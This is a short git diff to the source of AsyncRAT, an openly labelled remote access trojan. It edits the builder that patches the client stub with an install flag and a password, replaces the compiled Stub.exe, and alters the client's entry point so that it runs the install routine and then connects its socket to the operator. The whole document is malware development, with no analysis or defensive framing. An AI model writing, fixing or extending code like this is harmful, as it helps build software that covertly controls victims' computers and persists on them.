diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Builder.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Builder.cs index 978566e..79d181b 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Builder.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Builder.cs @@ -50,7 +50,7 @@ namespace AsyncRAT_Sharp.Forms method.Body.Instructions[i].Operand = textFilename.Text; if (method.Body.Instructions[i].Operand.ToString() == "false") - method.Body.Instructions[i].Operand = checkBox1.Checked.ToString(); + method.Body.Instructions[i].Operand = checkBox1.Checked.ToString().ToLower(); if (method.Body.Instructions[i].Operand.ToString() == "NYAN CAT") method.Body.Instructions[i].Operand = Settings.Password; diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe index a6af45d..d626cd0 100644 Binary files a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe and b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe differ diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs index 4085432..da40c54 100644 --- a/AsyncRAT-C#/Client/Program.cs +++ b/AsyncRAT-C#/Client/Program.cs @@ -1,6 +1,7 @@ using System.Threading; using Client.Sockets; using Client.Install; +using System; // │ Author : NYAN CAT // │ Name : AsyncRAT // Simple Socket @@ -18,7 +19,7 @@ namespace Client static void Main() { - if (Settings.Install == "true") + if (Convert.ToBoolean(Settings.Install)) NormalStartup.Install(); ClientSocket.InitializeClient();